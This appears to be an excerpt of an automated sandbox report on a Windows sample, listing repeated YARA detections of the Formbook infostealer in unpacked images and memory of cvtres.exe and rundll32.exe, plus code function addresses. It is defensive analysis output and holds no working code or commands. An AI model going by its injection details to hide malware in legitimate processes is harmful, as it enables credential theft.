          Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: gZU26RjMUU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeCode function: 0_2_00840CE70_2_00840CE7
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeCode function: 0_2_029A2F980_2_029A2F98
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeCode function: 0_2_029A09D90_2_029A09D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041C9503_2_0041C950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00408C6B3_2_00408C6B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00408C703_2_00408C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041BE423_2_0041BE42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041C66C3_2_0041C66C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041CFB53_2_0041CFB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05671D553_2_05671D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05672D073_2_05672D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A0D203_2_055A0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056725DD3_2_056725DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BD5E03_2_055BD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D25813_2_055D2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05662D823_2_05662D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566D4663_2_0566D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB4773_2_055CB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B841F3_2_055B841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056644963_2_05664496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05671FF13_2_05671FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0567DFCE3_2_0567DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C6E303_2_055C6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566D6163_2_0566D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05672EF73_2_05672EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AF9003_2_055AF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C41203_2_055C4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055C99BF3_2_055C99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0567E8243_2_0567E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056610023_2_05661002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA8303_2_055CA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056728EC3_2_056728EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BB0903_2_055BB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056720A83_2_056720A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D20A03_2_055D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CAB403_2_055CAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0564CB4F3_2_0564CB4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05672B283_2_05672B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA3093_2_055CA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DABD83_2_055DABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056523E33_2_056523E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566DBD23_2_0566DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056603DA3_2_056603DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D138B3_2_055D138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DEBB03_2_055DEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0565FA2B3_2_0565FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB2363_2_055CB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_056722AE3_2_056722AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B449611_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480841F11_2_0480841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BD46611_2_048BD466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B47711_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482258111_2_04822581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B2D8211_2_048B2D82
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C25DD11_2_048C25DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_047F0D2011_2_047F0D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480D5E011_2_0480D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C2D0711_2_048C2D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C1D5511_2_048C1D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C2EF711_2_048C2EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BD61611_2_048BD616
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04816E3011_2_04816E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048CDFCE11_2_048CDFCE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C1FF111_2_048C1FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480B09011_2_0480B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048220A011_2_048220A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C20A811_2_048C20A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C28EC11_2_048C28EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B100211_2_048B1002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048CE82411_2_048CE824
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481A83011_2_0481A830
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048199BF11_2_048199BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_047FF90011_2_047FF900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481412011_2_04814120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C22AE11_2_048C22AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4AEF11_2_048B4AEF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048AFA2B11_2_048AFA2B
